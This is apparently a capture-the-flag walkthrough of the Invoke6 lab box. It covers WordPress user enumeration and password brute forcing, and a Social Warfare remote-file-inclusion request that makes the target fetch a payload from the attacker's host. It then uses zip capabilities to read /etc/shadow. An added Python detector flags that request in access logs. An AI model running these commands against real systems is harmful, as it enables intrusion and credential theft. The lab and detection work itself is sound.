OGC: Invoke 6
Today we will be looking at Invoke6 on Vagrant, found here: https://app.vagrantup.com/overgrowncarrot1/boxes/Invoke6
Starting off with a RustScan we see the following ports:
Running a directory buster, we can see WordPress:
Let's enumerate users and plugins and see what we find:
wpscan --url http://192.168.0.44/wordpress -e u
wpscan --url http://192.168.0.44/wordpress -U george -P /usr/share/wordlists/fasttrack.txt
When running the above we see something weird, a plugin that was not detected before:
searchsploit social warfare
searchsploit -m php/webapps/46794.py
Now run the following:
http://<RHOST IP>/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://<LHOST IP AND PORT>/payload.txt
getcap -r / 2>/dev/null
We can see zip in the capabilities list, and this is a problem:
zip /tmp/shadow.zip /etc/shadow
Grabbing that hash, we can bring it back to ourselves and log in as root after cracking it:
Hopefully you learned something with this box. There are quite a few rabbit holes in it, so be careful where you step…
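From the blue-team side, the Social Warfare request shown above leaves a recognizable line in the web server's access log. The following is an added example, not part of the original walkthrough or of the plugin: it scans combined-format log lines for admin-post.php requests carrying swp_debug=load_options and a swp_url that points at a host other than the site itself. The function name, the site_hosts parameter and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not taken from the box).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://198.51.100.7:8000/payload.txt HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wordpress/wp-admin/admin-post.php?action=export HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2F198.51.100.7%2Fp.txt HTTP/1.1" 200 0 "-" "curl/8.0"
203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /wordpress/?s=swp_url HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Source address, request line and status code of one combined-format entry.
LINE_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def find_swp_requests(log_text, site_hosts=()):
    """Return one record per request that asks Social Warfare to load
    options from a URL whose host is not in site_hosts (hypothetical
    allow-list of the site's own hostnames)."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin-post.php"):
            continue
        # parse_qs percent-decodes values, so encoded URLs are caught too.
        params = parse_qs(url.query, keep_blank_values=True)
        if "load_options" not in params.get("swp_debug", []):
            continue
        for remote in params.get("swp_url", []):
            host = urlsplit(remote).hostname
            if host and host not in site_hosts:
                hits.append({"src": m["src"], "status": int(m["status"]),
                             "fetch_host": host, "swp_url": remote})
    return hits

if __name__ == "__main__":
    for hit in find_swp_requests(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so this only covers the query-string form used in the walkthrough.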